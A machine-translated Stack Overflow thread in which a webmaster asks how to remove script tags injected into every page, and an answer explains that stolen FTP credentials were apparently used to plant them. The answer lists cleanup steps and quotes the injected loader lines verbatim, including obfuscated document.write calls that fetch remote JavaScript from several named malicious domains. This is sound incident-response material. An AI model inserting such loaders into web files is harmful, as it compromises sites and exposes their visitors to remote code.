那些遇到过的问题

如何从脚本中删除脚本病毒

Web*_*orm 13 javascript

我有以下代码自动添加到我的脚本中...

<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script> 
<!--72628eb2e686638651ad69b6a34a630f-->
Run Code Online (Sandbox Code Playgroud)

在我的每个页面的末尾,当我看到我的页面的源代码时,它向我显示上面的代码但是当我在记事本或任何编辑软件中打开该文件时,它只向我显示我的脚本..如何从中删除该脚本我的所有文件一下子......

也让我知道为什么到目前为止发生了..

DMi*_*Min 9

编辑8月25日:
添加了特定的域名和条目(下方)
新域名nuttypiano.com被发现.

编辑:想
出来.肯定是Filezilla虹吸我的FTP密码.
密切注意.htaccess文件和文件权限 - 它们似乎更改为777.

也发生在我身上.它从FTP程序中获取了所有密码,然后更改了PHP和js文件以添加该行

<script type ="text/javascript"src ="http://obscurewax.ru/ Queue.js ">

主要是索引.*文件是针对其他文件的目标是*.js文件.

我相信结束js文件名不同,但您可以从obscurewax.ru域跟踪它.

我有大约8-10个网站发生这种情况.我的大多数网站都在运行joomla.在我观察到的内容中,它喜欢定位以单词index开头的文件.

在joomla安装中,大约有122个文件受此影响,几乎所有文件都在: joomla_install/administrator
文件夹中.

从服务器下载joomla安装很痛苦,因为它大约有4-5千个文件.不过,我所遵循的策略是这样的.

在文件夹下载整个站点,运行文本搜索(我正在使用TextCrawler): obscurewax.ru

请注意具有此功能的文件和文件夹的数量,更重要的是请注意js文件名的所有变体.

搜索并替换所有.js文件变体,例如:

<script type ="text/javascript"src ="http://obscurewax.ru/Queue.js">
<script type ="text/javascript"src ="http://obscurewax.ru/Cablemodem.js">
<script type ="text/javascript"src ="http://obscurewax.ru/Kilobyte.js">

在.js文件中,您还可以找到以下类型的代码: 

document.write('<s'+'cript type="text/javascript" 
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files
Run Code Online (Sandbox Code Playgroud)

全部替换所有('').
您可以做的另一件事是:使用example.com的obscurewax.ru

我没有一种快速简便的方法来删除它下面的注释中的代码(我认为它们用于跟踪目的.) - 但我认为如果删除脚本链接,该注释不会受到伤害您.

发现不同的域名:

  • nuttypiano.com(8月25日发现)
  • pocketbloke.ru
  • yumeye.ru
  • microlightning.ru
  • riotassistance.ru
  • // Denis125 <webmaster@atlant.ru>(在.js文件中发表评论.)

    • 需要注意的具体行:

    <script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster@atlant.ru>
// Author: Andrei Blagorazumov, a@fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');
    Run Code Online (Sandbox Code Playgroud)



    注意:有时您将无法在源代码中的html中看到此链接,但是,文件会被加载,因为它隐藏在其中一个JavaScripts中.确保您非常干净的一个好方法是实际进入并查看在加载页面时加载的.js文件,并检查是否有任何.js文件从可疑域加载.一个简单的方法是使用chrome(ctrl + shift + i)进入开发人员工具.在资源选项卡中,您将看到脚本过滤器,使用此过滤器可以跟踪加载页面时加载的所有.js文件.firefox中的firebug插件也会让你看到这个信息.如果您的网站有多个部分(前端,后端),您想访问网站的所有部分,并检查是否有任何可疑的.js文件被加载.

    非常重要的是

  • 更新防病毒扫描程序并在计算机上执行完整扫描以查找病毒.
  • 如果您使用的是FTP程序,或者您的代码编辑器具有FTP功能,您希望访问存储了密码的所有网站,并检查它们是否受到影响.如果您的FTP程序/编辑器遭到入侵 - 几乎所有存储了ftp密码的网站都会受到影响.
  • 更改程序中存储的所有ftp帐户的密码.
  • 卸载可疑程序并使用另一个程序或重新下载并安装它.

    • 这是Web开发人员可能遇到的最糟糕的事情.这种攻击通常是通过诱骗受害者(您和我)相信程序中的FTP程序有更新来完成,只要您安装更新 - 您的站点就会受到影响.

    我现在正在研究这件事.如果你有更好/更短的方法这样做.请分享.谢谢!

    • ;) 谢谢!我认为这是一种很棒的学习方式. (2认同)

    归档时间:

    查看次数:

    9501 次

    最近记录:

    14 年,3 月 前
    相关归档
    如何在浏览器中检查消失的元素? 118
    为什么我无法访问TypeScript私有成员? 102
    配置javascript执行的最佳方法是什么? 91
    将数据传递到jQuery UI对话框 83
    使用JavaScript获取用户代理 80
    使用JS触发css悬停 62
    更换&nbsp; 来自javascript dom文本节点 56
    多个javascript/css文件:最佳做法? 55
    没有花括号的箭头功能 47
    使Chrome扩展程序下载文件 45
    难疑归档
    我应该将哪个"href"值用于JavaScript链接,"#"或"javascript:void(0)"? 3980
    如何将某些内容附加到数组中? 2895
    如何异步上传文件? 2841
    为什么"使用命名空间std"被认为是不好的做法? 2486
    如何更改一个特定提交的提交作者? 1949
    代理服务器和反向代理服务器之间的区别 1726
    常规演员与static_cast与dynamic_cast 1661
    计算C#中的相对时间 1461
    获取JavaScript数组中的所有唯一值(删除重复项) 1273
    忽略git项目中的任何"bin"目录 1172